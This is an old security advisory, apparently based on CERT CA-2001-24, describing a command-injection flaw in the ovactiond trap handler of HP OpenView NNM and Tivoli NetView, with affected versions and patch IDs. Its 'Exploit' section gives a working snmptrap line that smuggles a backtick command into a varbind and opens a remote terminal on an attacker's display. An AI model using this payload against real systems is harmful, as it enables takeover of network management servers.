COMMAND

    OpenView and NetView

SYSTEMS AFFECTED

    Systems running HP OpenView Network Node Manager (NNM) Version 6.1
    Systems running Tivoli NetView Versions 5.x and 6.x

PROBLEM

    Following is based on a CERT Advisory CA-2001-24.  ovactiond is  a
    component of OpenView by Hewlett-Packard Company (HP) and  NetView
    by Tivoli, an  IBM Company (Tivoli).   These products are  used to
    manage  large   systems  and   networks.   There   is  a   serious
    vulnerability  in  ovactiond  that  allows  intruders  to  execute
    arbitrary   commands   with   elevated   privileges.    This   may
    subsequently lead  to an  intruder gaining  administrative control
    of a vulnerable machine.

    ovactiond is the SNMP trap and event handler for both OpenView and
    NetView.   There is  a vulnerability  in ovactiond  that allows an
    intruder  to  execute  arbitrary  commands  by sending a malicious
    message to  the management  server.   These commands  run with the
    privileges of  the ovactiond  process, which  varies according  to
    the operating system.

    OpenView version 6.1 is  vulnerable in the default  configuration.
    Versions  prior  to  6.1  are   not  vulnerable  in  the   default
    configuration, but  there are  public reports  that versions prior
    to 6.1 may be vulnerable if users have made customizations to  the
    trapd.conf file.

    Tivoli NetView versions  5.x and 6.x  are not vulnerable  with the
    default configuration.   It is,  however, likely  that  customized
    configurations are vulnerable.   This security vulnerability  only
    exists if an authorized  user configures additional event  actions
    and  specifies  potentially  destructive  varbinds  (those of type
    string or opaque).

    An intruder can execute arbitrary commands with the privileges  of
    the ovactiond process.  On UNIX systems, ovactiond typically  runs
    as user  bin; on  Windows systems  it typically  runs in the Local
    System security context.   On Windows NT  systems, this allows  an
    intruder  to  gain  administrative   control  of  the   underlying
    operating system.   On UNIX  systems, an  intruder may  be able to
    leverage bin access to gain root access.

    Additionally,  systems  running  these  products  often have trust
    relationships  with  other  network  devices.   An  intruder   who
    compromises these systems  may be able  to leverage this  trust to
    compromise other devices on the network or to make changes to  the
    network configuration.

    Exploit:

        snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""

SOLUTION

    On June  21, 2001,  HP released  a security  bulletin (HP SB #154)
    and a patch for this  vulnerability in OpenView version 6.1.   For
    more information, see

        http://us-support.external.hp.com/cki/bin/doc.pl/screen=ckiDisplayDocument?docId=200000055277985
        http://www.kb.cert.org/vuls/id/952171

    Apply one of these patches:

        HP-UX 11.00   HP-UX 10.20   SOLARIS 2.X   WinNT4.X/2000
        PHSS_23780    PHSS_23779    PSOV_02905    NNM_00698

    NNM 6.2 is not vulnerable.

    Tivoli has developed a patch for versions 5.x and 6.x.  The  patch
    addresses  the  vulnerability  in  ovactiond,  as  well  as taking
    preventative  measures  on  other  components specific to NetView.
    Tivoli has published information on this vulnerability at

        http://www.tivoli.com/support/